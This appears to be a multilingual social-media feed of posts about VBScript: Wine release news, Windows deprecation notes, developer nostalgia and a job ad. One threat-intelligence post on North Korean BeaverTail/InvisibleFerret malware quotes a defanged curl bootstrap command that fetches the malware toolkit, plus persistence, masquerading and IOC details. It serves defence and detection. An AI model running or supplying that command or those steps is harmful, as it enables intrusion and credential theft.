Wine est disponible en version 11.11. Cette version apporte SymCrypt à la place de TomCrypt, plus d’infos USER32 en mémoire partagée, des fenêtres superposées dans Wayland, des améliorations VBScript et divers correctifs ⬇️ winehq.org/news/2026061201

VBScriptも来年で終わりや

おみかんが過去に作ったVBScriptのもぐりのツールはいつまで使えるのやら。

Wine 11.11: nova versão com SymCrypt, suporte a Wayland e melhorias de VBScript livreeaberto.com/wine-11-11-…

編集ができなくても実行だけはできるかなと。あとはVBScriptに移行する方法もありますかね…(その場合はVSCodeのほうが近道かも)

Here is the VBScript deprecration notice

Vbscript?

Misc: VBScript deprecation notice has been added to Windows Installer Ability to choose date for pausing updates is mentioned setdefaultuserfolder.cmd has been removed Secure KMS (Key Management Service) has been added to slmgr.vbs and links to go.microsoft.com/fwlink/?lin… 3/3

classic ASP…って、VBScriptのやつのこと、そう呼ぶんだ…懐かしいなぁ その前ってCでCGI書いたりしてたもんなぁ。オイラの一番最初のお仕事も、Pro✱Cで作ったCGIだったなぁ…

@bogart_parra An unusually valuable matter for people in business to be aware of: historically, every tool that was thought to enable non-technical or non-programmer users to start doing what programmers do, has always become another layer of abstraction that required programmers to handle and use. Unix Utils (secretaries at AT&T & clerks at the patent office), SQL (meant for business managers to query sources of info & generate reports), VBScript (allow non-programmers to create useful business applications), VBSCcript in Excel & Office (meant for people in white collar to make useful logical functions and applications), Sharepoint widgets, … are just a handful of examples of things that were meant to enable nonprofessional non-programmers to do what programmers do: all of them have led to an explosion of industries, where nothing but programmers do all the work or cleanup for those who use these pieces of technology. Often what these things have done is make businesses dependent on proprietary applications and technology and the programmers are called in from the outset to avoid the much more expensive problem cleanup later. Every time a non-programmer is able to use some kind of tool to build something… it always requires programmers to then come back behind them and clean up the mess and generally it is more expensive to do this after the fact, because the mess is a mess so it is hard to understand and because no programmer built it there’s nobody who understands what is built. Often they have to then learn the mindset behind what was built and what was being attempted and then rebuild it from scratch anyway—often while pretending not to.

とはいえ、困ってるわけでもないし、このchipsetドライバーくん、未だ来vbscriptで動いてるらしく(なんならそのせいで壊れてる可能性まである)、ドライバーインストーラー自体がリニューアルされたタイミングでインストールでもいいかな…chipsetはアップデートしない…覚えとかなきゃ…

Famous Chollima related Hash [48f2a3bfb7a70b97875e56d932ada0d975cd5ee154a99caf7d93550275a1548a]: TTPs: The malware leverages a multi-stage infection process starting with social engineering . Victims are tricked into downloading a "demo project" (the ZIP file) and running it as part of a technical assessment. Once executed, the JavaScript-based BeaverTail fingerprints the system and checks for virtualized environments or sandboxes. It scans the filesystem for sensitive data, targeting over 200 browser profile directories (Chrome, Brave, Opera) to steal cookies, credentials, and cryptocurrency wallet extensions (MetaMask, Phantom, TronLink). The secondary payload, InvisibleFerret, is a modular Python RAT that provides full remote shell access and persistent control. Recent variants utilize VS Code Tasks (tasks.json) to automatically trigger execution the moment the project folder is opened in Visual Studio Code. API Interactions & Operations: Exact Command Run: On Windows, it typically launches a hidden window using wscript.exe to run a VBScript (e.g., start.vbs or update.vbs), which then executes a Python interpreter masquerading as a system process: cmd.exe /c svchost.exe updatedriver[.]py (where svchost.exe is actually python.exe). Registry Changes: For persistence, it modifies the Run registry keys to ensure execution upon system startup: HKCU\Software\Microsoft\Windows\CurrentVersion\Run. System Changes:Creates a hidden directory (e.g., ~/.n2 on Linux/macOS or AppData\Local\Temp subfolders on Windows) to stage stolen data. Adds Windows Defender exclusions via PowerShell to prevent detection of its payloads. Schedules tasks mimicking legitimate processes like RuntimeBroker.exe or svchost. Indicators of Compromise: Network Infrastructure: 172[.]86[.]116.178 (C2 Server for keylogging/screenshots) 193[.]124[.]33[.]71:3217 Most Important artefact: - Main file is dropping dozens of child files. One of these child files (a shell script named pre-commit) was observed attempting to execute: curl -fsSL https[:]//lab99[.]sbs/api/terminal/bootstrap?os=mac&flag=6 This is the bootstrap command that downloads the rest of the toolkit. Attack Chain: Social Engineering (LinkedIn/Fake Recruiter) --> Lure to clone malicious Repo (GitHub/GitLab) --> ZIP download ("Fintech Demo[.]zip") --> VS Code Auto-Run Task OR Manual Execution --> BeaverTail Infostealer (Credential/Wallet Theft) --> InvisibleFerret Python RAT (Persistence/Full Remote Control) --> C2 Exfiltration & Cryptojacking. #northkorea #famouschollima #beavertail #malware #threatintel #happyhunting #CyberSecurity

身の回りの仕事の簡単なツールを作るのに、メモ帳だけで作れるmshtaは便利だったのになぁ。VBScriptのサポートはそろそろ終わる一方、JScriptはまだ延命されている模様。Erinyesや時の故郷もhtaアプリケーションとして動いてたので、ぜひ延命してほしいツール。

KLA is hiring #Fresers for #Software Engineer. Location: #Chennai Eligibility: - Bachelor’s degree or higher in Computer Science, Computer Applications, Software Engineering, Automation, Electronic Engineering, or a related technical field. - Familiarity with software quality control processes and a good understanding of web UI testing concepts. - Proficiency in at least one programming or scripting language such as C/C , Python, Perl, or VBScript. - Experience with Visual Studio, automated testing frameworks, MySQL or Oracle databases, and Linux commands is preferred. - Fluent in spoken and written English. - Strong initiative, fast learning ability, proactive attitude, and excellent team spirit. Link: kla.wd1.myworkdayjobs.com/Se… #KLA